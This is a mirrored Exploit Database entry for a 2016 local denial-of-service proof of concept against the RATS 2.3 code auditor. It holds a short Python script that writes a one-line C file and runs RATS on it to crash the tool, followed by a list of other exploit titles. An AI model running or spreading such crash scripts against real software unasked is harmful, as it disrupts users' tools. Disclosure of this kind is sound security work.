Rough Auditing Tool for Security (RATS) 2.3 – Array Out of Block Crash

Exploit Database
90 阅读

作者： David Silveiro

日期： 2016-04-29
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/39747/

# Exploit Title: RATS 2.3 Array Out of Block Crash
# Date: 29th April 2016
# Exploit Author: David Silveiro
# Author Contact: twitter.com/david_silveiro
# Website: Xino.co.uk
# Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads
# Version: RATS 2.3
# Tested on: Ubuntu 14.04 LTS
# CVE : 0 day

from os import system


def crash():


with open('crash.c', 'w') as file:
file.write("char g [MAX_SIZE];") # Out of Block array, causes crash

try:
com = ('rats -w3 --xml crash.c')
return system(com)

except:
print("Is RATS installed?")


def main():

print("Author: David Silveiro")
print("Website:Xino.co.uk")
print("Title:RATS 2.3 Array Out Of Block Crash \n")

crash()


if __name__ == "__main__":
main()

last Exploits
Rough Auditing Tool for Security (RATS) 2.3 – Array Out of Block Crash的更多信息

Linux Kernel 2.6.x – ‘inotify_init1()’ Double-Free Local Denial of Service：
Huawei eSpace 1.1.11.103 – ‘ContactsCtrl.dll’ / ‘eSpaceStatusCtrl.dll’ ActiveX Heap Overflow：
Microsoft DirectWrite / AFDKO – Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray：
Local Server 1.0.9 – Denial of Service (PoC)：
APNGDis 2.8 – ‘image width / height chunk’ Heap Buffer Overflow：
NVIDIA Driver 375.70 – DxgkDdiEscape 0x100008b Out-of-Bounds Read/Write：
Sony Bravia KDL-32CX525 – ‘hping’ Remote Denial of Service：
Microsoft People 10.1807.2131.0 – Denial of service (PoC)：